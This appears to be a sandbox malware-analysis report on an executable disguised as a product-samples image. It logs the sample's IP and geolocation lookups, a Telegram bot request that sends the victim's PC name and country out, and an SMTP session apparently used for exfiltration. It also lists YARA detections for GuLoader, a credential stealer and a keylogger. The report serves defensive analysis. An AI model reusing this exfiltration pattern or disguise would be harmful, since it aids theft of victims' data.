                                                                                    1 | 192.168.11.30 | 49810 | 158.101.44.242 | 80 | 3392 | C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exe
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    Sep 24, 2024 16:31:10.307245016 CEST | 151 | OUT | GET / HTTP/1.1
                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                    Host: checkip.dyndns.org
                                                                                    Connection: Keep-Alive
                                                                                    Sep 24, 2024 16:31:10.468969107 CEST | 322 | IN | HTTP/1.1 200 OK
                                                                                    Date: Tue, 24 Sep 2024 14:31:10 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 105
                                                                                    Connection: keep-alive
                                                                                    Cache-Control: no-cache
                                                                                    Pragma: no-cache
                                                                                    X-Request-ID: 957ff30b159a94c0c1420b12b832c7e8
                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 79.127.132.20</body></html>
                                                                                    Sep 24, 2024 16:31:10.579926968 CEST | 127 | OUT | GET / HTTP/1.1
                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                    Host: checkip.dyndns.org
                                                                                    Sep 24, 2024 16:31:10.780144930 CEST | 322 | IN | HTTP/1.1 200 OK
                                                                                    Date: Tue, 24 Sep 2024 14:31:10 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 105
                                                                                    Connection: keep-alive
                                                                                    Cache-Control: no-cache
                                                                                    Pragma: no-cache
                                                                                    X-Request-ID: 75483204166ec66da7bc26984ede6c40
                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 79.127.132.20</body></html>
                                                                                    Sep 24, 2024 16:31:13.139579058 CEST | 127 | OUT | GET / HTTP/1.1
                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                    Host: checkip.dyndns.org
                                                                                    Sep 24, 2024 16:31:13.510498047 CEST | 322 | IN | HTTP/1.1 200 OK
                                                                                    Date: Tue, 24 Sep 2024 14:31:13 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 105
                                                                                    Connection: keep-alive
                                                                                    Cache-Control: no-cache
                                                                                    Pragma: no-cache
                                                                                    X-Request-ID: a19aab445e7fd7151820b157342621a6
                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 79.127.132.20</body></html>
                                                                                    Sep 24, 2024 16:31:14.071763992 CEST | 127 | OUT | GET / HTTP/1.1
                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                    Host: checkip.dyndns.org
                                                                                    Sep 24, 2024 16:31:14.240473986 CEST | 322 | IN | HTTP/1.1 200 OK
                                                                                    Date: Tue, 24 Sep 2024 14:31:14 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 105
                                                                                    Connection: keep-alive
                                                                                    Cache-Control: no-cache
                                                                                    Pragma: no-cache
                                                                                    X-Request-ID: e851aa056dc03ca5b7159f8274e32bd2
                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 79.127.132.20</body></html>
                                                                                    Sep 24, 2024 16:31:14.834005117 CEST | 127 | OUT | GET / HTTP/1.1
                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                    Host: checkip.dyndns.org
                                                                                    Sep 24, 2024 16:31:16.010607958 CEST | 322 | IN | HTTP/1.1 200 OK
                                                                                    Date: Tue, 24 Sep 2024 14:31:15 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 105
                                                                                    Connection: keep-alive
                                                                                    Cache-Control: no-cache
                                                                                    Pragma: no-cache
                                                                                    X-Request-ID: e2d70b4b25a7010ea10354e942f78850
                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 79.127.132.20</body></html>
                                                                                    Sep 24, 2024 16:31:16.587178946 CEST | 127 | OUT | GET / HTTP/1.1
                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                    Host: checkip.dyndns.org
                                                                                    Sep 24, 2024 16:31:16.747762918 CEST | 322 | IN | HTTP/1.1 200 OK
                                                                                    Date: Tue, 24 Sep 2024 14:31:16 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 105
                                                                                    Connection: keep-alive
                                                                                    Cache-Control: no-cache
                                                                                    Pragma: no-cache
                                                                                    X-Request-ID: 12c271b926bedb8c0b8a57a529ed04f9
                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 79.127.132.20</body></html>
                                                                                    Sep 24, 2024 16:31:17.341846943 CEST | 127 | OUT | GET / HTTP/1.1
                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                    Host: checkip.dyndns.org
                                                                                    Sep 24, 2024 16:31:17.550138950 CEST | 322 | IN | HTTP/1.1 200 OK
                                                                                    Date: Tue, 24 Sep 2024 14:31:17 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 105
                                                                                    Connection: keep-alive
                                                                                    Cache-Control: no-cache
                                                                                    Pragma: no-cache
                                                                                    X-Request-ID: 1f77f36c1a927a4fc8252aa510189ab6
                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 79.127.132.20</body></html>
                                                                                    Sep 24, 2024 16:31:18.159825087 CEST | 127 | OUT | GET / HTTP/1.1
                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                    Host: checkip.dyndns.org
                                                                                    Sep 24, 2024 16:31:18.897870064 CEST | 322 | IN | HTTP/1.1 200 OK
                                                                                    Date: Tue, 24 Sep 2024 14:31:18 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 105
                                                                                    Connection: keep-alive
                                                                                    Cache-Control: no-cache
                                                                                    Pragma: no-cache
                                                                                    X-Request-ID: cdc426e66e63ca032e5323ac34b86f45
                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 79.127.132.20</body></html>
                                                                                    Sep 24, 2024 16:31:19.500041008 CEST | 127 | OUT | GET / HTTP/1.1
                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                    Host: checkip.dyndns.org
                                                                                    Sep 24, 2024 16:31:19.663778067 CEST | 322 | IN | HTTP/1.1 200 OK
                                                                                    Date: Tue, 24 Sep 2024 14:31:19 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 105
                                                                                    Connection: keep-alive
                                                                                    Cache-Control: no-cache
                                                                                    Pragma: no-cache
                                                                                    X-Request-ID: 85c143d0ebca957c576e1014e3f8a4dd
                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 79.127.132.20</body></html>
                                                                                    Sep 24, 2024 16:31:20.252079010 CEST | 127 | OUT | GET / HTTP/1.1
                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                    Host: checkip.dyndns.org
                                                                                    Sep 24, 2024 16:31:20.421629906 CEST | 322 | IN | HTTP/1.1 200 OK
                                                                                    Date: Tue, 24 Sep 2024 14:31:20 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 105
                                                                                    Connection: keep-alive
                                                                                    Cache-Control: no-cache
                                                                                    Pragma: no-cache
                                                                                    X-Request-ID: 00086df772634ea665967cdadb916e70
                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 79.127.132.20</body></html>


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                    0 | 192.168.11.30 | 49811 | 172.67.177.134 | 443 | 3392 | C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exe
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    2024-09-24 14:31:12 UTC | 86 | OUT | GET /xml/79.127.132.20 HTTP/1.1
                                                                                    Host: reallyfreegeoip.org
                                                                                    Connection: Keep-Alive
                                                                                    2024-09-24 14:31:13 UTC | 663 | IN | HTTP/1.1 200 OK
                                                                                    Date: Tue, 24 Sep 2024 14:31:12 GMT
                                                                                    Content-Type: application/xml
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    access-control-allow-origin: *
                                                                                    vary: Accept-Encoding
                                                                                    Cache-Control: max-age=86400
                                                                                    CF-Cache-Status: MISS
                                                                                    Last-Modified: Tue, 24 Sep 2024 14:31:12 GMT
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gALl67wkC6rXLDqpNlKpHneknTfeIKG7yWLx9mx6hRi3hDF6tUZrwgDzQxENVajo6V7Q8DdFPtUZuXnwBaTBWj%2FtvDLMoHUQZ%2FreAKYHnIHhcU7KLNpUxhiSsVs8gVXOym3VUGC5"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8c837a0ff9dd066c-IAD
                                                                                    2024-09-24 14:31:13 UTC | 335 | IN | Data Ascii: 148<Response><IP>79.127.132.20</IP><CountryCode>CZ</CountryCode><CountryName>Czechia</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>Europe/Prague</TimeZone><Latitude>50.0848</La
                                                                                    2024-09-24 14:31:13 UTC | 5 | IN | Data Ascii: 0


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                    1 | 192.168.11.30 | 49812 | 172.67.177.134 | 443 | 3392 | C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exe
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    2024-09-24 14:31:13 UTC | 62 | OUT | GET /xml/79.127.132.20 HTTP/1.1
                                                                                    Host: reallyfreegeoip.org
                                                                                    2024-09-24 14:31:14 UTC | 676 | IN | HTTP/1.1 200 OK
                                                                                    Date: Tue, 24 Sep 2024 14:31:13 GMT
                                                                                    Content-Type: application/xml
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    access-control-allow-origin: *
                                                                                    vary: Accept-Encoding
                                                                                    Cache-Control: max-age=86400
                                                                                    CF-Cache-Status: HIT
                                                                                    Age: 1
                                                                                    Last-Modified: Tue, 24 Sep 2024 14:31:12 GMT
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JIRLClNbjvdNUfcPCijSA58LKgVWXwI6WZ92AIlUZ0QKL3OVA%2FBaD%2FngPpkkL1udLSNCk7aZx%2BqTBEUCyuzrM%2ByDWkZjKeURGVl2zlGIj3LKEke16%2B0j6E5Lu2zYKqWbS9oXwIfX"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8c837a1829c5208d-IAD
                                                                                    2024-09-24 14:31:14 UTC | 335 | IN | Data Ascii: 148<Response><IP>79.127.132.20</IP><CountryCode>CZ</CountryCode><CountryName>Czechia</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>Europe/Prague</TimeZone><Latitude>50.0848</La
                                                                                    2024-09-24 14:31:14 UTC | 5 | IN | Data Ascii: 0


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                    2 | 192.168.11.30 | 49813 | 172.67.177.134 | 443 | 3392 | C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exe
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    2024-09-24 14:31:14 UTC | 62 | OUT | GET /xml/79.127.132.20 HTTP/1.1
                                                                                    Host: reallyfreegeoip.org
                                                                                    2024-09-24 14:31:14 UTC | 678 | IN | HTTP/1.1 200 OK
                                                                                    Date: Tue, 24 Sep 2024 14:31:14 GMT
                                                                                    Content-Type: application/xml
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    access-control-allow-origin: *
                                                                                    vary: Accept-Encoding
                                                                                    Cache-Control: max-age=86400
                                                                                    CF-Cache-Status: HIT
                                                                                    Age: 2
                                                                                    Last-Modified: Tue, 24 Sep 2024 14:31:12 GMT
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JBgkeojFNJBs%2BThZ3ugy2j%2Bb2QfDkEKOtprFN2WzFfdNGkT42aBDcLhKGH4eErQ%2B2MWhuV%2FT8MDd72zla0SRb60x%2B45e6d8BBRcU6XoB6KpDGBmv%2BXtZzUKmQmEHxIlsPXcdHe0m"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8c837a1cbcf572f2-IAD
                                                                                    2024-09-24 14:31:14 UTC | 335 | IN | Data Ascii: 148<Response><IP>79.127.132.20</IP><CountryCode>CZ</CountryCode><CountryName>Czechia</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>Europe/Prague</TimeZone><Latitude>50.0848</La
                                                                                    2024-09-24 14:31:14 UTC | 5 | IN | Data Ascii: 0


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                    3 | 192.168.11.30 | 49814 | 172.67.177.134 | 443 | 3392 | C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exe
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    2024-09-24 14:31:16 UTC | 62 | OUT | GET /xml/79.127.132.20 HTTP/1.1
                                                                                    Host: reallyfreegeoip.org
                                                                                    2024-09-24 14:31:16 UTC | 674 | IN | HTTP/1.1 200 OK
                                                                                    Date: Tue, 24 Sep 2024 14:31:16 GMT
                                                                                    Content-Type: application/xml
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    access-control-allow-origin: *
                                                                                    vary: Accept-Encoding
                                                                                    Cache-Control: max-age=86400
                                                                                    CF-Cache-Status: HIT
                                                                                    Age: 4
                                                                                    Last-Modified: Tue, 24 Sep 2024 14:31:12 GMT
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HlwX5zb%2BsIzr6NFTUa%2FqlKZaYJKyfy1zogIpSTSPEkzrcBAsADJGuim8UaGD4NNrJYn3zzefBwdJ2b6HlaPmzmck0DO0JlLNP3nHDPR%2F78xkaxgLhPF4UOJ5oZILDilvo%2Fn2tvv8"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8c837a27b9936fa1-IAD
                                                                                    2024-09-24 14:31:16 UTC | 335 | IN | Data Ascii: 148<Response><IP>79.127.132.20</IP><CountryCode>CZ</CountryCode><CountryName>Czechia</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>Europe/Prague</TimeZone><Latitude>50.0848</La
                                                                                    2024-09-24 14:31:16 UTC | 5 | IN | Data Ascii: 0


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                    4 | 192.168.11.30 | 49815 | 172.67.177.134 | 443 | 3392 | C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exe
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    2024-09-24 14:31:16 UTC | 62 | OUT | GET /xml/79.127.132.20 HTTP/1.1
                                                                                    Host: reallyfreegeoip.org
                                                                                    2024-09-24 14:31:17 UTC | 676 | IN | HTTP/1.1 200 OK
                                                                                    Date: Tue, 24 Sep 2024 14:31:17 GMT
                                                                                    Content-Type: application/xml
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    access-control-allow-origin: *
                                                                                    vary: Accept-Encoding
                                                                                    Cache-Control: max-age=86400
                                                                                    CF-Cache-Status: HIT
                                                                                    Age: 5
                                                                                    Last-Modified: Tue, 24 Sep 2024 14:31:12 GMT
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HXTMscgwknVi12lPn4MuIXxwqPLnCI5jDBot9CaAjsZkVH5Faeu22I3QxbONzhj9RS9QFoshvjA3lnjbW0pD%2Bq849Kc1SG11M%2BNaOxnH3wdtgXPywf%2FDOIRFFptphKt%2FXPA4PCb%2B"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8c837a2c684581b8-IAD
                                                                                    2024-09-24 14:31:17 UTC | 335 | IN | Data Ascii: 148<Response><IP>79.127.132.20</IP><CountryCode>CZ</CountryCode><CountryName>Czechia</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>Europe/Prague</TimeZone><Latitude>50.0848</La
                                                                                    2024-09-24 14:31:17 UTC | 5 | IN | Data Ascii: 0


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                    5 | 192.168.11.30 | 49816 | 172.67.177.134 | 443 | 3392 | C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exe
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    2024-09-24 14:31:17 UTC | 62 | OUT | GET /xml/79.127.132.20 HTTP/1.1
                                                                                    Host: reallyfreegeoip.org
                                                                                    2024-09-24 14:31:18 UTC | 668 | IN | HTTP/1.1 200 OK
                                                                                    Date: Tue, 24 Sep 2024 14:31:18 GMT
                                                                                    Content-Type: application/xml
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    access-control-allow-origin: *
                                                                                    vary: Accept-Encoding
                                                                                    Cache-Control: max-age=86400
                                                                                    CF-Cache-Status: HIT
                                                                                    Age: 6
                                                                                    Last-Modified: Tue, 24 Sep 2024 14:31:12 GMT
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mmWpIGrtRHA8M%2B3WiJZtsIk9hfqQgIIISSvVoOc6H92FpVcUmbWcpFZDtY9JoV0qUvHGN6uLtyvRPOSNSSscuqybIxw1MkK1EkOxSfPNjGw5qHxLbKqYJtYvEr24qtjh5D3hjUO4"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8c837a316fdd05e5-IAD
                                                                                    2024-09-24 14:31:18 UTC | 335 | IN | Data Ascii: 148<Response><IP>79.127.132.20</IP><CountryCode>CZ</CountryCode><CountryName>Czechia</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>Europe/Prague</TimeZone><Latitude>50.0848</La
                                                                                    2024-09-24 14:31:18 UTC | 5 | IN | Data Ascii: 0


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                    6 | 192.168.11.30 | 49817 | 172.67.177.134 | 443 | 3392 | C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exe
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    2024-09-24 14:31:19 UTC | 62 | OUT | GET /xml/79.127.132.20 HTTP/1.1
                                                                                    Host: reallyfreegeoip.org
                                                                                    2024-09-24 14:31:19 UTC | 680 | IN | HTTP/1.1 200 OK
                                                                                    Date: Tue, 24 Sep 2024 14:31:19 GMT
                                                                                    Content-Type: application/xml
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    access-control-allow-origin: *
                                                                                    vary: Accept-Encoding
                                                                                    Cache-Control: max-age=86400
                                                                                    CF-Cache-Status: HIT
                                                                                    Age: 7
                                                                                    Last-Modified: Tue, 24 Sep 2024 14:31:12 GMT
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Bc%2BnZuy%2FBWxOW3bLkrzT6iebi2zy%2FfnX26QsiuMFsLfN75Uysv3G6kr%2Bty%2BgX1DiGlWu24PGiXCjG3rXrbcvsm7xAe9zeGRi8Ezi00qIP0pq2O5uwKb%2BJaURbmZO3s%2BvQey0m1No"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8c837a39dbc105e6-IAD
                                                                                    2024-09-24 14:31:19 UTC | 335 | IN | Data Ascii: 148<Response><IP>79.127.132.20</IP><CountryCode>CZ</CountryCode><CountryName>Czechia</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>Europe/Prague</TimeZone><Latitude>50.0848</La
                                                                                    2024-09-24 14:31:19 UTC | 5 | IN | Data Ascii: 0


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                    7 | 192.168.11.30 | 49818 | 172.67.177.134 | 443 | 3392 | C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exe
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    2024-09-24 14:31:19 UTC | 62 | OUT | GET /xml/79.127.132.20 HTTP/1.1
                                                                                    Host: reallyfreegeoip.org
                                                                                    2024-09-24 14:31:20 UTC | 672 | IN | HTTP/1.1 200 OK
                                                                                    Date: Tue, 24 Sep 2024 14:31:20 GMT
                                                                                    Content-Type: application/xml
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    access-control-allow-origin: *
                                                                                    vary: Accept-Encoding
                                                                                    Cache-Control: max-age=86400
                                                                                    CF-Cache-Status: HIT
                                                                                    Age: 8
                                                                                    Last-Modified: Tue, 24 Sep 2024 14:31:12 GMT
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6Kj6P1rRnjoIWVhPIf1wxKVP1eCUSrjDc7ZS2XDlX0Md4AIlFQBVdKb10ukd%2Fr82%2BLyJix9HVKxBTl0ca5%2F6Bd73Nbdwhrxqchb9KIeGUs0OT0XMz36b8W862embuXlJaG8geZzp"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8c837a3e9f8bdda7-IAD
                                                                                    2024-09-24 14:31:20 UTC | 335 | IN | Data Ascii: 148<Response><IP>79.127.132.20</IP><CountryCode>CZ</CountryCode><CountryName>Czechia</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>Europe/Prague</TimeZone><Latitude>50.0848</La
                                                                                    2024-09-24 14:31:20 UTC | 5 | IN | Data Ascii: 0


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                    8 | 192.168.11.30 | 49819 | 172.67.177.134 | 443 | 3392 | C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exe
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    2024-09-24 14:31:20 UTC | 62 | OUT | GET /xml/79.127.132.20 HTTP/1.1
                                                                                    Host: reallyfreegeoip.org
                                                                                    2024-09-24 14:31:20 UTC | 670 | IN | HTTP/1.1 200 OK
                                                                                    Date: Tue, 24 Sep 2024 14:31:20 GMT
                                                                                    Content-Type: application/xml
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    access-control-allow-origin: *
                                                                                    vary: Accept-Encoding
                                                                                    Cache-Control: max-age=86400
                                                                                    CF-Cache-Status: HIT
                                                                                    Age: 8
                                                                                    Last-Modified: Tue, 24 Sep 2024 14:31:12 GMT
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3uBkdfA0X8Gk3j7lraD2r1wwj0wpdPQBluTi9RlkF1OsEJT2X9OcTQ5x8G%2FbyXEtXhvdwql3lOz8g7WvosmeT6EXm1kAOdxwGeh4uIouy36HgeWJATZEfz9HEOO%2FcHIRkM8NwSJx"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8c837a435911c95a-IAD
                                                                                    2024-09-24 14:31:20 UTC | 335 | IN | Data Ascii: 148<Response><IP>79.127.132.20</IP><CountryCode>CZ</CountryCode><CountryName>Czechia</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>Europe/Prague</TimeZone><Latitude>50.0848</La
                                                                                    2024-09-24 14:31:20 UTC | 5 | IN | Data Ascii: 0


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                    9 | 192.168.11.30 | 49820 | 149.154.167.220 | 443 | 3392 | C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exe
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    2024-09-24 14:31:21 UTC | 341 | OUT | GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:888683%0D%0ADate%20and%20Time:%2024/09/2024%20/%2010:31:19%0D%0ACountry%20Name:%20Czechia%0D%0A%5B%20888683%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
                                                                                    Host: api.telegram.org
                                                                                    Connection: Keep-Alive
                                                                                    2024-09-24 14:31:22 UTC | 344 | IN | HTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.18.0
                                                                                    Date: Tue, 24 Sep 2024 14:31:22 GMT
                                                                                    Content-Type: application/json
                                                                                    Content-Length: 55
                                                                                    Connection: close
                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                    Access-Control-Allow-Origin: *
                                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                    2024-09-24 14:31:22 UTC | 55 | IN | Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


                                                                                    Timestamp | Source Port | Dest Port | Source IP | Dest IP | Commands
                                                                                    Sep 24, 2024 16:31:29.174940109 CEST | 587 | 49821 | 185.230.214.164 | 192.168.11.30 | 220 mx.zoho.eu SMTP Server ready September 24, 2024 4:31:29 PM CEST
                                                                                    Sep 24, 2024 16:31:29.175318956 CEST | 49821 | 587 | 192.168.11.30 | 185.230.214.164 | EHLO 888683
                                                                                    Sep 24, 2024 16:31:29.631243944 CEST | 587 | 49821 | 185.230.214.164 | 192.168.11.30 | 250-mx.zoho.eu Hello 888683 (79.127.132.20 (79.127.132.20))
                                                                                    Sep 24, 2024 16:31:29.631299019 CEST | 587 | 49821 | 185.230.214.164 | 192.168.11.30 | 250-STARTTLS
                                                                                    Sep 24, 2024 16:31:29.631337881 CEST | 587 | 49821 | 185.230.214.164 | 192.168.11.30 | 250 SIZE 53477376
                                                                                    Sep 24, 2024 16:31:29.631556034 CEST | 49821 | 587 | 192.168.11.30 | 185.230.214.164 | STARTTLS
                                                                                    Sep 24, 2024 16:31:29.821167946 CEST | 587 | 49821 | 185.230.214.164 | 192.168.11.30 | 220 Ready to start TLS.

                                                                                    Target ID:0
                                                                                    Start time:10:29:41
                                                                                    Start date:24/09/2024
                                                                                    Path:C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exe"
                                                                                    Imagebase:0x400000
                                                                                    File size:634'320 bytes
                                                                                    MD5 hash:9CA0138738DCC4FAA58C59C0898D4834
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.17886564519.0000000008520000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                    Reputation:low
                                                                                    Has exited:true

                                                                                    Target ID:2
                                                                                    Start time:10:30:52
                                                                                    Start date:24/09/2024
                                                                                    Path:C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exe"
                                                                                    Imagebase:0x400000
                                                                                    File size:634'320 bytes
                                                                                    MD5 hash:9CA0138738DCC4FAA58C59C0898D4834
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.22139880474.00000000346F0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000002.00000002.22139880474.00000000346F0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000002.00000002.22139880474.00000000346F0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
